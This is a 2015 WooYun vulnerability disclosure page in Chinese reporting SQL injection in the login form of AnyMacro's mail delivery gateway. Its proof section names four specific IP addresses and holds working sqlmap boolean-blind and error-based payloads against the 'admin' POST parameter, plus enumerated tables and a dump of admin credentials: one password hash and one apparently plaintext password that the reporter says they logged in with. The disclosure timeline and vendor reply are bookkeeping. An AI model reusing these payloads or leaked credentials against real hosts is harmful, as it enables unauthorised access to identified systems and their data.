AnyMacro邮件投递网关系统存在SQL注射 | wooyun-2015-0100766| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100766

漏洞标题：AnyMacro邮件投递网关系统存在SQL注射

漏洞作者：路人甲

提交时间：2015-03-11 20:56

修复时间：2015-06-14 13:12

公开时间：2015-06-14 13:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-11：细节已通知厂商并且等待厂商处理中
2015-03-16：厂商已经确认，细节仅向厂商公开
2015-03-19：细节向第三方安全合作伙伴开放
2015-05-10：细节向核心白帽子及相关领域专家公开
2015-05-20：细节向普通白帽子公开
2015-05-30：细节向实习白帽子公开
2015-06-14：细节向公众公开

简要描述：

详细说明：

公司主页
http://www.anymacro.com/index.htm
安宁邮件投递网关系统
登录框参数admin存在post注入
地址

https://115.25.86.234/
https://115.25.86.236/
https://115.25.86.233/
https://115.25.86.235/

漏洞证明：

admin的密码解不开，只登录了anytest

sqlmap identified the following injection points with a total of 198 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: deliver
[13 tables]
+---------------------------------------+
| domain                                |
| user                                  |
| admin                                 |
| config                                |
| defer                                 |
| deliverlog                            |
| erruser                               |
| eventlog                              |
| ipdata                                |
| mailserver                            |
| proclog                               |
| queue                                 |
| total                                 |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: deliver
Table: admin
[8 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| date     | datetime         |
| no       | int(11) unsigned |
| admin    | varchar(64)      |
| descp    | varchar(100)     |
| disabled | char(2)          |
| flag     | char(2)          |
| ip       | varchar(100)     |
| passwd   | varchar(32)      |
+----------+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: admin (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: admin=admim' RLIKE (SELECT (CASE WHEN (3036=3036) THEN 0x61646d696d ELSE 0x28 END)) AND 'gZTf'='gZTf&btn.x=66&btn.y=29&password=asd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: admin=admim' AND (SELECT 4088 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (CASE WHEN (4088=4088) THEN 1 ELSE 0 END)),0x71766b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nwwQ'='nwwQ&btn.x=66&btn.y=29&password=asd
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: deliver
Table: admin
[2 entries]
+---------+----------------------------------+
| admin   | passwd                           |
+---------+----------------------------------+
| admin   | $1$655765$t1uDwWFXaeykAb0zQtlLm/ |
| anytest | anb1arfj9f85U                    |
+---------+----------------------------------+

修复方案：

联系厂家

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-03-16 13:10

厂商回复：

CNVD确认并复现所述情况，已经由CNVD通过网站公开联系方式（或以往建立的处置渠道）向网站管理单位（软件生产厂商）通报。

漏洞评价：

2015-03-12 09:37 | cncert国家互联网应急中心(乌云厂商)

您好！感谢您对CNVD的支持，请您提供新的案例，并邮件vreport@cert.org.cn邮箱，以便CNVD及时验证、处置。祝好！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100766

漏洞标题：AnyMacro邮件投递网关系统存在SQL注射

相关厂商：AnyMacro

漏洞作者：路人甲

提交时间：2015-03-11 20:56

修复时间：2015-06-14 13:12

公开时间：2015-06-14 13:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100766

漏洞标题：AnyMacro邮件投递网关系统存在SQL注射

相关厂商：AnyMacro

漏洞作者： 路人甲

提交时间：2015-03-11 20:56

修复时间：2015-06-14 13:12

公开时间：2015-06-14 13:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0100766"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云